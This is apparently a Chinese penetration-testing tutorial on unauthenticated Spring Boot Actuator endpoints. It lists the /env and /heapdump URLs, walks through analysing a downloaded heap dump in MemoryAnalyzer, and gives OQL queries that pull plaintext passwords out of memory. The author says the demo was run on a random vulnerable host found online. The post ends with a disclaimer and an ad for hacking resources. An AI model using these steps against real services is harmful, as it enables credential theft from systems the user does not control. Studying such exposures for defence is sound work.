内网环境-Actuator漏洞排查与利用
-
需要清扫内网环境特定漏洞
-
速度小于每秒50左右,大于会被封ip
-
内网禁止安装任何未授权软件-只能自己写脚本
Actuator介绍
Actuator’æ ktʃʊˌeɪtə是 Spring Boot 提供的对应用系统的自省和监控的
集成功能,可以对应用系统进行配置查看、相关功能统计等。在 Spring Cloud 中主要是完成微服务的监控,完成监控治理。可以查看微服务间的数据处理和调用,当它们之间出现了异常,就可以快速定位到出现问题的地方。
Actuator监控项
若未授权,则可通过访问的方式获取信息,造成信息泄露
利用方法
-
http://127.0.0.1:port/actuator
-
http://127.0.0.1:port/actuator/env
/heapdump利用方法
后缀:
http://127.0.0.1:port/actuator/heapdump
http://127.0.0.1:port/actuator/actuator/heapdump
注:临时网络上随便搜索了一个存在的漏洞做测试演示:
利用内存泄漏分析软件MemoryAnalyzer解析Heap Dump(堆转储文件),获取隐藏的密码
探测后缀名actuator/env 若网页存在,全局搜索password,发现如下图:
访问Actuator/heapdump 后缀发现可下载内存文件
利用内存分析工具分析上述下载文件:
1.选择
2.File->open Heap Dump -> 选择 All Files->然后选择hump文件->利用OQL查找
可利用以下可用的oql代码在堆信息中找到明文密码(代码啥意思自行百度吧,我也百度了好几个小时各种尝试实验才完全弄明白…)select * from java.util.Hashtable$Entry x WHERE (toString(x.key).contains("password"))
select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("password"))
/**hua**/select * from java.util.LinkedHashMap$Entry x WHERE (toString(x.key).contains("spring.datasource.password"))
select * from java.util.HashMap$Node x WHERE (toString(x.key).contains("password"))
可看到密码:
附带极简测试代码
注:需要请自行根据原始代码就行优化,如:增加参数,遍历,日志,独立运行功能等
声明:⽂中所涉及的技术、思路和⼯具仅供以安全为⽬的的学习交流使⽤,任何⼈不得将其⽤于⾮法⽤途以及盈利等⽬的,否则后果⾃⾏承担。所有渗透都需获取授权!
免费领取安全学习资料包!
渗透工具
技术文档、书籍
面试题
帮助你在面试中脱颖而出
视频
基础到进阶
环境搭建、HTML,PHP,MySQL基础学习,信息收集,SQL注入,XSS,CSRF,暴力破解等等
应急响应笔记
学习路线